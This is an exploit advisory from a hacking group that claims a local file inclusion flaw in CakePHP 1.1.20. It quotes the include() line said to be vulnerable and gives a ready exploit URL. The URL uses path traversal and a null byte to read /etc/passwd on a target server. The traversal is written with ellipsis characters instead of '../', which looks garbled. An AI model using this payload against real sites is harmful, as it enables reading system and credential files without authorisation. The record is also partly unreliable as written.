++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+
+ CakePHP 1.1.20 Local File Inclusion Vulnerability
+
+ Discovered by Cru3l.b0y
+
+ WwW.DeltaHacking.Net
+
+
+
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
###################################################################################################
AUTHOR : Cru3l.b0y
APPLICATION : CakePHP
VERSION : 1.1.20
DOWNLOAD :
http://cakeforge.org/frs/download.php/677/cake_1.1.20.7692.tar.gz/donation=complete
VENDOR : http://cakeforge.org/
###################################################################################################
Vulnerable Code :
###################################################################################################
/cake/libs/configure.php
215 include(CONFIGS . $fileName . '.php');
[+]Exploit:
http://[t4rg3t]/[p4th]/cake/libs/configure.php?fileName=…/…/…/etc/passwd%00
###################################################################################################